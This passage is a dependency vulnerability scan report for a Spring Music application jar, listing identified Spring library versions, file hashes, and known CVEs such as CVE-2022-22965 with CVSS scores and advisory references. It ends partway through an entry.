Evidence Type Source Name Value Confidence Vendor central artifactid spring-core Highest Vendor central groupid org.springframework Highest Vendor file name spring-core High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name core Highest Vendor jar package name core Low Vendor jar package name springframework Low Vendor Manifest automatic-module-name spring.core Medium Vendor pom artifactid spring-core Low Vendor pom developer email jhoeller@pivotal.io Low Vendor pom developer id jhoeller Medium Vendor pom developer name Juergen Hoeller Medium Vendor pom groupid org.springframework Highest Vendor pom name Spring Core High Vendor pom organization name Spring IO High Vendor pom organization url http://projects.spring.io/spring-framework Medium Vendor pom url spring-projects/spring-framework Highest Product central artifactid spring-core Highest Product file name spring-core High Product hint analyzer product springsource_spring_framework Highest Product jar package name core Highest Product jar package name core Low Product Manifest automatic-module-name spring.core Medium Product Manifest Implementation-Title spring-core High Product pom artifactid spring-core Highest Product pom developer email jhoeller@pivotal.io Low Product pom developer id jhoeller Low Product pom developer name Juergen Hoeller Low Product pom groupid org.springframework Highest Product pom name Spring Core High Product pom organization name Spring IO Low Product pom organization url http://projects.spring.io/spring-framework Low Product pom url spring-projects/spring-framework High Version central version 5.0.5.RELEASE Highest Version Manifest Implementation-Version 5.0.5.RELEASE High Version pom version 5.0.5.RELEASE Highest
Related Dependencies spring-music-sqldb-1.0.jar: spring-aop-5.0.5.RELEASE.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-aop-5.0.5.RELEASE.jar MD5: cadac0a0a42d54e5a94ab13e9824ee73 SHA1: b11b61b94d7fb752a1c9bf3461d655c3084fae47 SHA256: 347b27caecd859a6e62aa40dd5868f9a3e76e03fccea70e10c1ddba5bf177b3d pkg:maven/org.springframework/spring-aop@5.0.5.RELEASE spring-music-sqldb-1.0.jar: spring-aspects-5.0.5.RELEASE.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-aspects-5.0.5.RELEASE.jar MD5: 2d1900f8ef64edc7a65af133c86a7e21 SHA1: 34994566374425cfdf82634720b010ed20be512d SHA256: 91b698da905943f2339ed3d3edb498ab30fdc5d5a4692acd27bde99a3bb41195 pkg:maven/org.springframework/spring-aspects@5.0.5.RELEASE spring-music-sqldb-1.0.jar: spring-beans-5.0.5.RELEASE.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-beans-5.0.5.RELEASE.jar MD5: 90a6ee8a8d1db99deed70a1ec2724fd7 SHA1: 984445863c0bbdaaf860615762d998b471a6bf92 SHA256: dab1f19aafd2d53137c886b806cdc2a4f2193e66f55b96a37d10fb92fd204663 pkg:maven/org.springframework/spring-beans@5.0.5.RELEASE spring-music-sqldb-1.0.jar: spring-context-support-5.0.5.RELEASE.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-context-support-5.0.5.RELEASE.jar MD5: 71a328d065455ddc7cf24b37e13b0e5e SHA1: 109c6bf2e869f055728219b361c78102de434158 SHA256: ddb4e0ae18c6c5c3c296bfb24b5ea0f8aa8bd54c5b43908488afa97ab07e87aa pkg:maven/org.springframework/spring-context-support@5.0.5.RELEASE spring-music-sqldb-1.0.jar: spring-jcl-5.0.5.RELEASE.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-jcl-5.0.5.RELEASE.jar MD5: e0f5ea39bc55be9f60a12ca2d8d48ec2 SHA1: f4a2854b9d865e8b86717595aec16f877f8c6489 SHA256: 285ac46f7a2a8d1ebeefbbf0d53d0b19a81cccb4f2bb4b79bf1a8d6720f208c8 pkg:maven/org.springframework/spring-jcl@5.0.5.RELEASE spring-music-sqldb-1.0.jar: spring-jdbc-5.0.5.RELEASE.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-jdbc-5.0.5.RELEASE.jar MD5: 20baf804148676045ef08363d638a69a SHA1: 456bc4d2281c37aa2f2206651a3048a1d3559d2a SHA256: 8439c614146b0d13689f25b1c261e428f7f70c2cd27b56accf8f8a5d9f1f33be pkg:maven/org.springframework/spring-jdbc@5.0.5.RELEASE spring-music-sqldb-1.0.jar: spring-orm-5.0.5.RELEASE.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-orm-5.0.5.RELEASE.jar MD5: a5aa940f69ab3e8eaa74a78351e7409b SHA1: 6734f5ef4c2ebf1d00021fd4b314138f10792174 SHA256: 953a8460e3c6ae10bc3d1a03ec1c941f482148fa9d5306f75f20088bd39bdcf5 pkg:maven/org.springframework/spring-orm@5.0.5.RELEASE spring-music-sqldb-1.0.jar: spring-oxm-5.0.5.RELEASE.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-oxm-5.0.5.RELEASE.jar MD5: 568c7d340722850fd1cb29afcd4fd8d8 SHA1: cf4dcac4ed1ba50bfe681e1e51a0c6a616782dd0 SHA256: c804544ec756d7c79f72e83f34684f353e0146c48d59677b945e0813dc418a9a pkg:maven/org.springframework/spring-oxm@5.0.5.RELEASE spring-music-sqldb-1.0.jar: spring-tx-5.0.5.RELEASE.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-tx-5.0.5.RELEASE.jar MD5: b30070684e5049de9a45c27ddc2cce86 SHA1: b772fbba533da282adc89f33e2619ee8a8bba601 SHA256: 15504d883a21315dc22a00487e0078fb5b50b25bdfe3e55bd545301c98f12f42 pkg:maven/org.springframework/spring-tx@5.0.5.RELEASE CVE-2022-22965 suppress
CISA Known Exploited Vulnerability: Product: VMware Spring Framework Name: Spring Framework JDK 9+ Remote Code Execution Vulnerability Date Added: 2022-04-04 Description: Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. Required Action: Apply updates per vendor instructions. Due Date: 2022-04-25 Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-22965
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - US_GOVERNMENT_RESOURCE security@vmware.com - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY security@vmware.com - MITIGATION,VENDOR_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2018-1258 suppress
Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. CWE-863 Incorrect Authorization
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P References:
OSSINDEX - [CVE-2018-1258] CWE-863: Incorrect Authorization OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1258 OSSIndex - https://jira.spring.io/browse/SPR-16757 OSSIndex - https://pivotal.io/security/cve-2018-1258 af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2024-22259 suppress
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.
This is the same as CVE-2024-22243 https://spring.io/security/cve-2024-22243 , but with different input. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2018-11040 suppress
Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the "jsonp" and "callback" JSONP parameters, enabling cross-domain requests. CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11040 OSSIndex - https://jira.spring.io/browse/SPR-16798 OSSIndex - https://pivotal.io/security/cve-2018-11040 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - MITIGATION,VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-15756 suppress
Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
OSSINDEX - [CVE-2018-15756] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15756 OSSIndex - https://pivotal.io/security/cve-2018-15756 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,URL_REPURPOSED,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,URL_REPURPOSED,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-5398 suppress
In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), CWE-494 Download of Code Without Integrity Check
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.6) Vector: /AV:N/AC:H/Au:N/C:C/I:C/A:C References:
Vulnerable Software & Versions: (show all )
CVE-2018-1257 suppress
Spring Framework, versions 5.0.x prior to 5.0.6, versions 4.3.x prior to 4.3.17, and older unsupported versions allows applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a regular expression, denial of service attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
OSSINDEX - [CVE-2018-1257] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1257 OSSIndex - https://jira.spring.io/browse/SPR-16731 OSSIndex - https://pivotal.io/security/cve-2018-1257 af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-5421 suppress
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N/E:1.3/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.6) Vector: /AV:N/AC:H/Au:S/C:P/I:P/A:N References:
OSSINDEX - [CVE-2020-5421] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5421 OSSIndex - https://tanzu.vmware.com/security/cve-2020-5421 af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security@pivotal.io - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - THIRD_PARTY_ADVISORY security@pivotal.io - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-22950 suppress
n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2023-20861 suppress
In Spring Framework versions 6.0.0 - 6.0.6, 5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2018-11039 suppress
Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2018-11039] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11039 OSSIndex - https://jira.spring.io/browse/SPR-16836 OSSIndex - https://pivotal.io/security/cve-2018-11039 af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - MITIGATION,VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-22968 suppress
In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. CWE-178 Improper Handling of Case Sensitivity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-22970 suppress
In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, applications that handle file uploads are vulnerable to DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: spring-data-commons-2.0.6.RELEASE.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-data-commons-2.0.6.RELEASE.jarMD5: 13ff69d6655acfbd8dce2885c5ff3b4dSHA1: 4d65fdcbe258961e866f4f85c87c13193bbfd18cSHA256: 8747a7a6d3cc7bd19f0992ccd4f56b40a9562ad0b3ad76d856c2e8a66134bf73
Evidence Type Source Name Value Confidence Vendor file name spring-data-commons High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name core Highest Vendor jar package name data Highest Vendor jar package name springframework Highest Vendor Manifest automatic-module-name spring.data.commons Medium Vendor pom artifactid spring-data-commons Low Vendor pom groupid org.springframework.data Highest Vendor pom name Spring Data Core High Vendor pom parent-artifactid spring-data-parent Low Vendor pom parent-groupid org.springframework.data.build Medium Product file name spring-data-commons High Product jar package name core Highest Product jar package name data Highest Product jar package name springframework Highest Product Manifest automatic-module-name spring.data.commons Medium Product Manifest Implementation-Title Spring Data Core High Product pom artifactid spring-data-commons Highest Product pom groupid org.springframework.data Highest Product pom name Spring Data Core High Product pom parent-artifactid spring-data-parent Medium Product pom parent-groupid org.springframework.data.build Medium Version Manifest Implementation-Version 2.0.6.RELEASE High Version pom version 2.0.6.RELEASE Highest
CVE-2018-1259 suppress
Spring Data Commons, versions 1.13 prior to 1.13.12 and 2.0 prior to 2.0.7, used in combination with XMLBeam 1.4.14 or earlier versions, contains a property binder vulnerability caused by improper restriction of XML external entity references as underlying library XMLBeam does not restrict external reference expansion. An unauthenticated remote malicious user can supply specially crafted request parameters against Spring Data's projection-based request payload binding to access arbitrary files on the system. CWE-611 Improper Restriction of XML External Entity Reference
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: spring-data-jpa-2.0.6.RELEASE.jarDescription:
